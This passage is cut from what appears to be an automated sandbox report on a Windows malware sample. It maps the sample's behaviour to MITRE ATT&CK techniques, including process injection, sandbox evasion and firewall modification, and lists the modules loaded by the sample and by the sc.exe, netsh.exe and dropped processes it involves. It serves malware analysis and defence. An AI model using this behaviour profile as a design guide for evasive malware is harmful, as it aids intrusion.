"Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"KERNEL32.DLL\" at base 760b0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"WS2_32.DLL\" at base 75ff0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"DBGHELP.DLL\" at base 6eb80000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"USER32.DLL\" at base 759a0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"ADVAPI32.DLL\" at base 75ba0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"SHELL32.DLL\" at base 769b0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"OLEAUT32.DLL\" at base 77910000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"MSVCR100.DLL\" at base 6a930000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"NTDLL.DLL\" at base 77760000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"OLE32.DLL\" at base 77600000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74320000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"PROPSYS.DLL\" at base 743f0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"COMCTL32.DLL\" at base 74560000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"APPHELP.DLL\" at base 75510000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"CLBCATQ.DLL\" at base 76230000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ad10000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760b0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"SETUPAPI.DLL\" at base 75de0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"RPCRT4.DLL\" at base 766c0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 743f0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"NTMARTA.DLL\" at base 74ad0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75ad0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"PROFAPI.DLL\" at base 75670000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75860000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 762c0000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"SECUR32.DLL\" at base 75390000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75950000\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 75af0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 778f0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71cf0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 760b0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 766c0000\n \"npkqjwg.exe\" loaded module \"GDI32.DLL\" at base 75af0000\n \"npkqjwg.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 778f0000\n \"npkqjwg.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71cf0000\n \"npkqjwg.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"npkqjwg.exe\" loaded module \"KERNEL32\" at base 760b0000\n \"npkqjwg.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"npkqjwg.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6e980000\n \"npkqjwg.exe\" loaded module \"KERNEL32.DLL\" at base 760b0000\n \"npkqjwg.exe\" loaded module \"WS2_32.DLL\" at base 75ff0000\n \"npkqjwg.exe\" loaded module \"DBGHELP.DLL\" at base 6eb80000\n \"npkqjwg.exe\" loaded module \"USER32.DLL\" at base 759a0000\n \"npkqjwg.exe\" loaded module \"ADVAPI32.DLL\" at base 75ba0000\n \"npkqjwg.exe\" loaded module \"SHELL32.DLL\" at base 769b0000\n \"npkqjwg.exe\" loaded module \"OLEAUT32.DLL\" at base 77910000\n \"npkqjwg.exe\" loaded module \"MSVCR100.DLL\" at base 6a930000\n \"npkqjwg.exe\" loaded module \"SSPICLI.DLL\" at base 754f0000\n \"npkqjwg.exe\" loaded module \"RPCRT4.DLL\" at base 766c0000\n \"npkqjwg.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ad0000\n \"npkqjwg.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75510000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71cf0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 760b0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 73940000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 72bf0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 760b0000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6e8e0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6e110000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6be60000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760b0000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6e6b0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6ca50000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6d550000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6ca90000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6ca40000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6c7d0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6bdd0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 6a320000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 766c0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 6a960000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6ca30000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 6a930000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 6a3e0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6c7c0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 69d20000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 77600000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75560000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74320000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75070000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 759a0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76230000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c290000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75ba0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75ad0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75ad0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75ad0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ad0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e00000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75600000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6d3f0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75970000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74c40000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74d40000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77910000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 760b0000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 77760000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 72350000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 715f0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 766c0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71ab0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73c70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 738d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75ad0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73460000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75030000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74ef0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 737d0000\n 